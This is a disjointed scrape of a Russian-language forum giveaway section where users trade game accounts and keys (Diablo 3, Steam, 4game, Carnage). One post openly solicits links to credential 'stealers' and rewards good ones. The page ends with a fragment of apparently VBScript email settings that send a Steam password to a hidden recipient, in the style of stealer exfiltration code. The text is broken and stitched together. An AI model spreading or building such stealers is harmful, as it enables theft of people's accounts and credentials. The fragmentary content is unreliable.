- Бесплатные раздачи аккаунтов, инвайтов и прочего. Публикуется только собственная информация авторов - если кто-то разместил Ваши данные, требуйте их удаления.
Буду очень признателен,за ключик от Diablo 3. (Могу предложить Steam аккаунты)
Взял аккаунт? поставь спасибку Для просмотра ссылок или изображений в подписях, у Вас должно быть не менее 10 сообщение(ий). Сейчас у Вас 0 сообщение(ий). Приму в дар аккаунты 4game с балансом от 8 рублей.
Принимаю ссылки на стиллеры.
Содержашихся в темах, файлообменниках, за действительно стоюшие стиллеры, ставлю плюсики.
Всем привет около 3-х лет назад играл в carnage (браузерка), но забросил. Теперь хочу поиграть снова, а с нуля лень качать. Надеюсь на халяву ^^ Подарите акк с персом лвла эдак 6-го) Стата не сильно важна. Заранее спасибо)
sendusername") = "[Ссылки могут видеть только зарегистрированные пользователи. ]"
sendpassword") = "asdfghsteampassnow"
objMessage.To = "[Ссылки могут видеть только зарегистрированные пользователи. ]"